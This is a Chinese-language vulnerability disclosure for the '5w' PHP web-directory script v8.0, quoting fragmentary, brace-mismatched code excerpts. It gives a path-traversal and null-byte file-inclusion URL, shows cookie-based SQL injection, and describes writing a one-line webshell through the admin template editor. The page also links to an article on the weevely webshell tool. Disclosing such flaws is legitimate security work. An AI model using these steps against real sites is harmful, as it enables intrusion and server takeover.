// uploadiindex.php
//略
$controller = !empty($_GET['c']) ? $_GET['c'] : 'index';
$action = !empty($_GET['a']) ? $_GET['a'] : 'index';
//cookie 自动登陆 并判断 uri
if (isset($_COOKIE['cUser']) && $_COOKIE['cUser']['userID'] != 0) {
$userID = GetCUserID();
$domain = GetCUserDomain();
$sql = 'SELECT * FROM members WHERE userID = "'.$userID.'"';
$arrRow = $objC -> GetRow($sql);
//http://t.qq.com/MakeBug
}
}
}else if($domain == 'c' || $domain == 'a' || $domain == ''){
$domain = GetCUserDomain();
$params['controller'] = $controller;
$params['action'] = $action;
$params['domain'] = $domain;
}
//http://t.qq.com/MakeBug
$filePath = CONTROLLER_PATH . $classname.'.php';
//这怎么过?
|
利用方法:http://127.0.0.1/i/index.php?c=/../robots.txt%00
可以考虑包含日志等。 (鸡肋)
后台 Shell 篇。
uploadadminthemedetail.php:
// uploadadminthemedetail.php
//http://t.qq.com/MakeBug
if(isset($_POST['content'])){
$content = stripslashes(htmlspecialchars_decode($_POST['content']));
$theme = $_POST['theme'];
$file = $_POST['file'];
if(!array_key_exists($file,$files))die('不存在此模板文件');
if(!preg_match("/^w+/$/",$theme))die('模板路径异常');
$path = TEMPLATES.'theme/'.$theme.$file;
if(is_file($path)){
$rs = file_put_contents($path,$content);
if($rs)
flushHTML('模板修改成功!');
//http://t.qq.com/MakeBug
}
//http://t.qq.com/MakeBug
}else{
if($_GET['theme']){
$theme = $_GET['theme'];
}else{
$theme = THEME_PATH;
}
$path = TEMPLATES.'theme/'.$theme.$_GET['file'];
if(is_file($path)){
$content = htmlspecialchars(getContent($path));
$objS -> assign("content",$content);
$objS -> assign("theme",$theme);
$objS -> assign("file",$_GET['file']);
$objS -> display("admin/themedetail.tpl");
}
}
}
|
//利用方法:直接编辑写入一句话。注入key的问题。
文章来源于lcx.cc:【Php】5w五维网址导航 v8.0 漏洞 - 脚本漏洞
相关推荐: PHP后门生成工具weevely分析
唐门三少 发表于 2012-10-19 11:07 最近闲的蛋疼,玩了下weevely这个工具,感觉还是蛮强大的,防查杀,连接也是加密的。感兴趣的朋友看正文吧。 0x01 摘要 weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于t…
评论